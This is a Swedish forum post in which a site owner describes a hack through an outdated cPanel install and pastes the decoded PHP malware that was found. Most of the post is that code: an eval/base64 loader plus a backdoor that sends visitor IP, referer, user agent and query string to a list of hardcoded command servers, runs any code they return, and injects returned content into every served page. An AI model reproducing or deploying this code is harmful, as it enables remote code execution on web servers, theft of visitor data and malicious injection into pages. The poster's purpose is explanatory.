Min hemsida blev drabbad av liknande kod. Jag är mycket mån om säkerhet och var helt säker på att det inte var i något av mina script. Visade sig att webbhotellet hade en gammal cpanel version som hade säkerhetshål.
Rensade upp koden helt och hållet.
PHP-kod:
<?php
/*02650a6c543e9196f2170570283ae32b_on*/
$evil_code = **NÄSTA KOD RUTA**;
$z = create_function('$arg1', eval .'(base64_decode($arg1));');
$z($evil_code); //Kör nästa rutas kod
/*02650a6c543e9196f2170570283ae32b_off*/
?>
$evil_code, det är detta som körs och är det viktiga. Allt annat är bara för att dölja denna bit kod.
PHP-kod:
<?php
if (!function_exists("GetMama")) {
function ahfudflfzdhfhs($pa) {
$mama = GetMama();
$file = urlencode(__FILE__);
if(isset($_SERVER["HTTP_HOST"])){
$host = $_SERVER["HTTP_HOST"];
} else{
$host = "";
}
if(isset($_SERVER["REMOTE_ADDR"])){
$ip = $_SERVER["REMOTE_ADDR"];
} else{
$ip = "";
}
if (isset($_SERVER["HTTP_REFERER"])){
$ref = urlencode($_SERVER["HTTP_REFERER"]);
} else {
$ref = "";
}
if (isset($_SERVER["HTTP_USER_AGENT"])){
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
} else {
$ua = "";
}
if (isset($_SERVER["QUERY_STRING"])){
$qs = urlencode($_SERVER["QUERY_STRING"]);
} else {
$qs = "";
}
$url_0 = "http://" . $pa;
$url_1 = "/jedi.php?version=0997&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;
$try = true;
if( function_exists("curl_init") ){
$ch = curl_init($url_0 . $url_1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$ult = trim(curl_exec($ch));
$try = false;
}
if ((ini_get("allow_url_fopen")) && $try) {
$ult = trim(@file_get_contents($url_0 . $url_1));
$try = false;
}
if($try){
$fp = fsockopen($pa, 80, $errno, $errstr, 30);
if ($fp) {
$out = "GET $url_1 HTTP/1.0\r\n";
$out .= "Host: $pa\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
$ret = "";
while (!feof($fp)) {
$ret .= fgets($fp, 128);
}
fclose($fp);
$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
}
}
if (strpos($ult,"eval") !== false){
$z = stripslashes(str_replace("eval","",$ult));
eval($z);
exit();
}
if (strpos($ult,"ebna") !== false){
$_SERVER["good"] = str_replace("ebna","",$ult);
return true;
} else {
return false;
}
}
function gogo(){
$father2[] = "77.81.241.253";
$father2[] = "46.249.58.135";
$father2[] = "176.9.241.150";
$father2[] = "46.37.169.56";
$father2[] = "94.242.255.35";
$father2[] = "178.162.129.223";
$father2[] = "31.184.234.96";
$father2[] = "77.95.18.189";
$father2[] = "93.170.137.22";
$father2[] = "188.40.95.244";
$father2[] = "199.115.231.58";
$father2[] = "82.192.87.178";
$father2[] = "216.246.99.215";
$father2[] = "95.211.18.79";
shuffle($father2);
foreach($father2 as $ur){
if ( ahfudflfzdhfhs($ur) ) {
return true;
}
}
}
function mod_con($buf){
str_ireplace("<body>","<body>",$buf,$cnt_h);
if ($cnt_h == 1) {
gogo();
$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf);
return $buf;
}
str_ireplace("</body>","</body>",$buf,$cnt_h);
if ($cnt_h == 1) {
gogo();
$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf);
return $buf;
}
return $buf;
}
function opanki($buf){
$gz_e = false;
$h_l = headers_list();
if (in_array("Content-Encoding: gzip", $h_l)){
$gz_e = true;
}
if ($gz_e){
$tmpfname = tempnam("/tmp", "FOO");
$zf = fopen($tmpfname, "w");
fputs($zf, $buf);
fclose($zf);
$zd = gzopen($tmpfname, "r");
$contents = gzread($zd, 10000000);
$contents = mod_con($contents);
gzclose($zd);
unlink($tmpfname);
$contents = gzencode($contents);
} else {
$contents = mod_con($buf);
}
$len = strlen($contents);
header("Content-Length: ".$len);
return($contents);
}
function GetMama(){
$mother = "sedom";
return $mother;
}
ob_start("opanki");
}